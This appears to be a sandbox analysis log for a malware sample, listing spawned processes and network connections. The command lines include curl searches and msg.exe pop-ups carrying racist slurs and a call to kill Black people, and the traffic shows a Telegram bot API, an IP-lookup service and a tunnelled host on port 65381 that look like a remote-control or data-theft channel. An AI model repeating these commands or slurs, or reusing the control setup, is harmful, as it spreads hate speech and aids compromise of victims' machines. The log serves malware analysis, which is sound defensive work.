"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=78 --always-read-main-dll --field-trial-handle=20268,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20468 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=79 --always-read-main-dll --field-trial-handle=20784,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20772 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=80 --always-read-main-dll --field-trial-handle=20960,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20924 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=81 --always-read-main-dll --field-trial-handle=21180,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=20812 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=82 --always-read-main-dll --field-trial-handle=21372,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=21400 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=83 --always-read-main-dll --field-trial-handle=2068,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2832 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=84 --always-read-main-dll --field-trial-handle=21444,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=2800 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=85 --always-read-main-dll --field-trial-handle=21804,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=21956 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=86 --always-read-main-dll --field-trial-handle=22120,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22084 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=87 --always-read-main-dll --field-trial-handle=22372,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22420 /prefetch:1
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
C:\Windows\system32\curl.exe
curl -s "https://www.google.com/search?q=gay+femboy+porn+hitler+niggers"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=88 --always-read-main-dll --field-trial-handle=22276,i,17569229795195383801,4836656048598833576,262144 --variations-seed-version --mojo-platform-channel-handle=22540 /prefetch:1
C:\Windows\system32\msg.exe
msg * /time:1 "Rasauq on top"
C:\Windows\system32\msg.exe
msg * /time:1 "ran by Rasauq"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq owns me"
C:\Windows\system32\msg.exe
msg * /time:1 " Rasauq is daddy"
C:\Windows\system32\msg.exe
msg * /time:1 "kill all niggas"
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://pattern-cyber-report.glitch.me/
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | sky-aerial-derby.glitch.me | udp |
| US | 151.101.2.59:443 | sky-aerial-derby.glitch.me | tcp |
| US | 192.124.249.41:80 | crl.starfieldtech.com | tcp |
| US | 151.101.67.3:80 | ocsp.int-r1.certainly.com | tcp |
| US | 151.101.2.59:443 | sky-aerial-derby.glitch.me | tcp |
| US | 162.159.129.232:443 | media.discordapp.net | tcp |
| US | 162.159.129.232:443 | media.discordapp.net | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 173.231.16.77:443 | api64.ipify.org | tcp |
| US | 173.231.16.77:443 | api64.ipify.org | tcp |
| N/A | 127.0.0.1:49803 | tcp | |
| N/A | 127.0.0.1:49810 | tcp | |
| N/A | 127.0.0.1:49844 | tcp | |
| N/A | 127.0.0.1:49846 | tcp | |
| NL | 149.154.167.220:443 | api.telegram.org | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| US | 8.8.8.8:53 | clients2.google.com | udp |
| GB | 142.250.200.46:443 | clients2.google.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 150.171.28.11:80 | edge.microsoft.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 8.8.8.8:53 | copilot.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 95.100.153.186:443 | copilot.microsoft.com | tcp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| US | 8.8.8.8:53 | clients2.googleusercontent.com | udp |
| GB | 142.250.187.225:443 | clients2.googleusercontent.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| US | 8.8.8.8:53 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | udp |
| GB | 2.18.190.170:443 | msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 8.8.8.8:53 | niggafart.com | udp |
| US | 104.21.66.212:443 | niggafart.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 95.100.153.192:443 | www.bing.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 8.8.8.8:53 | edge.microsoft.com | udp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 95.100.153.192:443 | www.bing.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 8.8.8.8:53 | edgeassetservice.azureedge.net | udp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| US | 13.107.246.64:443 | edgeassetservice.azureedge.net | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 162.159.128.233:443 | discord.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| N/A | 224.0.0.251:5353 | udp | |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-consumer-static.azureedge.net | udp |
| US | 13.107.246.64:443 | edge-consumer-static.azureedge.net | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.180.3:80 | c.pki.goog | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 151.101.66.59:443 | pattern-cyber-report.glitch.me | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| US | 8.8.8.8:53 | static.edge.microsoftapp.net | udp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 13.107.246.64:443 | static.edge.microsoftapp.net | tcp |
| US | 150.171.28.11:443 | edge.microsoft.com | tcp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-mobile-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 8.8.8.8:53 | edge-cloud-resource-static.azureedge.net | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 13.107.246.64:443 | edge-cloud-resource-static.azureedge.net | tcp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 8.8.8.8:53 | pattern-cyber-report.glitch.me | udp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 104.21.66.212:443 | niggafart.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| US | 151.101.194.59:443 | pattern-cyber-report.glitch.me | tcp |
| GB | 95.100.153.167:443 | www.bing.com | udp |
| US | 147.185.221.26:65381 | looking-brings.gl.at.ply.gg | tcp |
| GB | 142.250.179.228:443 | www.google.com | tcp |
